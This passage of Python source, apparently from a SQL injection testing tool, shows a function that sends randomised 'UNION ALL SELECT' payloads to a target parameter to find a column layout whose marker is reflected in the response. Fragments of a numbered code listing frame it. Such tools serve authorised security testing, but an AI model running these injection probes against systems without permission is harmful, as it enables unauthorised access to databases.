(place, parameter, prefix, suffix)
| 182 | return retVal |
| 183 | |
def _fuzzUnionCols(place, parameter, prefix, suffix):
    """
    Probes column-type layouts for a UNION query and returns the first one
    whose quoted string marker is reflected in the response

    Runs only when a back-end DBMS has been identified, kb.pageTemplate does
    not already match FUZZ_UNION_ERROR_REGEX and kb.orderByColumns is set.
    Returns the list of column expressions with the reflected column replaced
    by "%s", or None when no layout produced a reflection
    """

    if not Backend.getIdentifiedDbms() or re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") or not kb.orderByColumns:
        return None

    comment = queries[Backend.getIdentifiedDbms()].comment.query

    # Shuffled in place, so the order in which layouts are tried differs between runs
    columnTypes = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
    random.shuffle(columnTypes)

    # NOTE: the search space is len(columnTypes) ** kb.orderByColumns layouts, and every
    # layout that survives the filter below costs one Request.queryPage() call
    for layout in itertools.product(columnTypes, repeat=kb.orderByColumns):
        # The reflection check further down only inspects quoted columns, so a layout
        # without a string column could never be confirmed
        if FUZZ_UNION_COLUMN.STRING not in layout:
            continue

        # Every column gets its own fresh random integer and random 20-character
        # marker; both values are drawn for each column regardless of its type
        columns = []
        for columnType in layout:
            number = str(randomInt())
            marker = "'%s'" % randomStr(20)
            columns.append(columnType.replace(FUZZ_UNION_COLUMN.INTEGER, number).replace(FUZZ_UNION_COLUMN.STRING, marker))

        fromClause = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")
        query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(columns), fromClause), prefix=prefix)
        query = agent.suffixQuery(query, suffix=suffix, comment=comment)
        payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
        page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
        content = page or ""

        # A response matching the error regex is treated as a rejected layout
        if re.search(FUZZ_UNION_ERROR_REGEX, content):
            continue

        # First quoted marker found verbatim in the response decides the result;
        # that column is swapped for the "%s" placeholder
        for column in columns:
            if column.startswith("'") and column.strip("'") in content:
                return [("%s" if _ == column else _) for _ in columns]

    return None
| 213 | |
| 214 | def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): |
| 215 | validPayload = None |